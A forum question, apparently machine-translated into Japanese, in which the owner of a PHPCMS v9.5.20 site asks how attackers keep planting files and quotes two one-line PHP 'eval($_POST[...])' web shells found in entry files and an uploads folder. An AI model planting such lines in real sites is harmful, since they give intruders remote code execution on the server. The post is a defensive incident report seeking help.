Web サイトのプログラムがトロイの木馬 [<?php eval($_POST[1]);?> ok] に侵入されました。メカニズムの解明にご協力ください。
伊谢尔伦
伊谢尔伦 2017-06-26 10:48:58
0
5
2349

最近 Web サイトが頻繁にハッカー攻撃を受けているため、できるだけ早く抜け穴を見つけて懸念を解決できるよう、考え方を明確にするために PHP の専門家の協力を求めています。

このインシデントは次のように説明されています:

1. Web サイトは、デフォルト バージョンの PHPCMS_V9_5.20 を使用して構築されています。

2. すべてのファイルは、最初は完全にオープンなアクセス許可でサーバーのルート ディレクトリに保存されます。

3. その後、Web サイトがハッキングされ、エントリー ファイル api.php とindex.php が書き換えられました。

4. 埋め込まれたウイルス ファイルは「One Sentence Trojan」です。内容は次のとおりです:

<?php @eval($_POST['dcs-19']);?>
<?php

5. が見つかりました。問題が発生した場合は、削除した後、そのようなファイルのアクセス許可をロックし、これで問題が解決すると考えてください。しかし、数日後、Web サイトのスナップショットが乗っ取られていたことが判明したため、再度確認してトロイの木馬を駆除したところ、トロイの木馬ファイルの場所はサーバーのルート ディレクトリの Uploadfile20170527 フォルダにあったことがわかりました。このファイルは、添付ファイルをアップロードしたり、バックグラウンドで記事を更新したりするときに、日付に基づいて自動的に作成されます。しかし、記事は5月27日に更新されなかったが、Webサイトの問題の根本原因を調査するために専門家に協力を求める内容が掲載された。

トロイの木馬の内容は次のとおりです:

<?php eval($_POST[1]);?>
ok

添付: インターネットで関連コンテンツを検索したところ、Web サイトのプログラムの脆弱性による SQL インジェクション攻撃であることが多く、脆弱性の修正を求められましたが、どうやって修正すればよいのでしょうか? PHP バージョンをオンラインでアップグレードすると便利ですか?

[技術的には初心者なので、わからないこともたくさんありますが、わからないことがあれば、質問欄で補足させていただきますので、ご安心ください! ]

伊谢尔伦
伊谢尔伦

小伙看你根骨奇佳,潜力无限,来学PHP伐。

全員に返信(5)
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート
私たちについて 免責事項 Sitemap
PHP中国語ウェブサイト:福祉オンライン PHP トレーニング,PHP 学習者の迅速な成長を支援します!